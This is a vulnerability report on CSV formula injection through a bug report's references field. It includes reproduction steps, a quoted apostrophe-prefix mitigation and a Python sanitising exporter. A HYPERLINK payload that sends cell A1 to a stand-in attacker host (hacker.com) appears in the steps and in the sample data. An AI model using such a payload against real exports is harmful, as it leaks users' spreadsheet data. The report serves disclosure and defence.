Summary: CSV Excel Macro Injection in the ‘reference’ value
Description: This is inherently risky, because any cell starting with the ‘=’ character will be interpreted by spreadsheet software as a formula.
Steps To Reproduce
1. In the References field of the bug report, add the payload below:
=HYPERLINK("http://hacker.com?leak="&A1,"Error: please click for further information")
2. Download the report as CSV and check the References column.
What is it?
CSV Excel Macro Injection is also known as CEMI.
Many web applications allow the user to download content such as invoice templates or user settings as a CSV file. Many users open the CSV file in Excel, LibreOffice or OpenOffice. When a web application does not properly validate the contents it writes into the CSV file, the contents of one or more cells can be executed as formulas by the spreadsheet software.
The CSV cell will display the text “Error: please click for further information”; if the user clicks on this message, the contents of cell A1 are sent to http://hacker.com?leak=, which may include the user's sensitive data.
“Spreadsheet software could take steps to mitigate some of these attacks, but preventing formula injection is ultimately the responsibility of every application that generates spreadsheets containing user-supplied content. At present, the best defence strategy we are aware of is prefixing cells that start with ‘=’, ‘+’ or ‘-’ with an apostrophe. This will ensure that the cell isn’t interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed.
Another lesson from this is that .csv and .tsv files should not be viewed as equivalent to .txt files in terms of safety, as it’s simple to embed active content into them.”
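As an added example (not code from this report or from the affected application), the following Python export routine applies the apostrophe mitigation quoted above to every cell before it is written. It goes beyond the quoted list of ‘=’, ‘+’ and ‘-’ by also neutralising ‘@’, tab and carriage return, which spreadsheet software likewise treats as formula or field triggers, and it quotes every field so that embedded commas, quotes and newlines cannot break out of a cell. The sample rows, the example.test URL and the function names are constructed for illustration; the payload string is the one from the report.

```python
import csv
import io

# Leading characters that make spreadsheet software parse a cell as a formula.
# The quoted advice covers '=', '+' and '-'; '@', tab and carriage return are
# added here because Excel honours them as well (an extension of the page's list).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(cell: str) -> bool:
    """Return True if the cell text would be interpreted as a formula."""
    return cell.startswith(FORMULA_TRIGGERS)


def sanitize_cell(cell: object) -> str:
    """Neutralise one cell for CSV export.

    A triggering cell is prefixed with an apostrophe so the spreadsheet treats
    it as text. None becomes an empty string; other values are stringified.
    """
    text = "" if cell is None else str(cell)
    if is_formula_like(text):
        return "'" + text
    return text


def export_csv(header, rows) -> str:
    """Serialise header and rows to CSV text with every cell sanitised.

    QUOTE_ALL wraps each field in double quotes and doubles embedded quotes,
    so field separators and newlines inside user data stay inside the cell.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow([sanitize_cell(h) for h in header])
    for row in rows:
        writer.writerow([sanitize_cell(c) for c in row])
    return buf.getvalue()


# Constructed sample data: the payload from the report stored in the
# user-controlled "references" field of a bug report.
PAYLOAD = '=HYPERLINK("http://hacker.com?leak="&A1,"Error: please click for further information")'
SAMPLE_HEADER = ["id", "title", "references"]
SAMPLE_ROWS = [
    [101, "Stored XSS in profile", "https://example.test/ref"],  # harmless reference
    [102, "CSV injection test", PAYLOAD],                        # hostile reference
    [103, "Negative number", "-5"],                              # legitimate but prefixed
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_HEADER, SAMPLE_ROWS))
```

The third sample row shows the known cost of this mitigation: a legitimate value such as "-5" is also prefixed, so an exporter that must preserve numeric columns should sanitise only the free-text columns and keep typed numeric data as numbers.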